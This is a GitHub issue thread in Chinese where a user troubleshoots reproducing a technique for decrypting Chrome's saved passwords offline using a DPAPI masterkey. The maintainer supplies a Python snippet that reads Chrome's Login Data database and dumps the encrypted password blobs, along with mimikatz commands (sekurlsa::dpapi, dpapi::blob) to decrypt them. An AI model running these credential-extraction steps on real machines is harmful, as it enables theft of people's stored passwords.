根据利用Masterkey离线导出Chrome浏览器中保存的密码出现问题

3gstudent / feedback

0 stars 0 forks source link

根据利用Masterkey离线导出Chrome浏览器中保存的密码出现问题 #39

Closed helloyw closed 4 years ago

helloyw commented 4 years ago

请教一下根据利用Masterkey离线导出Chrome浏览器中保存的密码这篇文章，进行复现得过程中出现了错误，在最后一步通过mimikaz解密得时候dpapi::blob /in:test.txt，mimikaz出现了崩溃得现象 7QJ9NT(~44JDB TF(J4(XWN

3gstudent commented 4 years ago

看看是不是生成的test.txt有问题可以尝试使用Windows Password Recovery解密test.txt的内容，如果无法解密，应该是test.txt的问题

helloyw commented 4 years ago

这是脚本内容

BQ%FTO687HNP1ELJT3$ LPL

3gstudent commented 4 years ago

from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))

看看能不能获得加密内容

helloyw commented 4 years ago

可以获取到输出：7631302379f22cdbbd4dbc4dd35fde4b5f5f44d5def93e9a4f4d3b11c7f5436940544f65d748b5de94098e23

3gstudent commented 4 years ago

privilege::debug sekurlsa::dpapi dpapi::blob /in test.txt

看看在线方式能不能正常解密

helloyw commented 4 years ago

dpapi::blob /in test.txt不加冒号啥也不输出，加了直接mimikaz崩溃 6~K4R}HCWHW9L`4N8{6C %V

3gstudent commented 4 years ago

是dpapi::blob /in:test.txt

你可以改一下源码加一些调试信息：https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/dpapi/kuhl_m_dpapi.c#L33

看看是哪一步报错了

helloyw commented 4 years ago

好的感谢！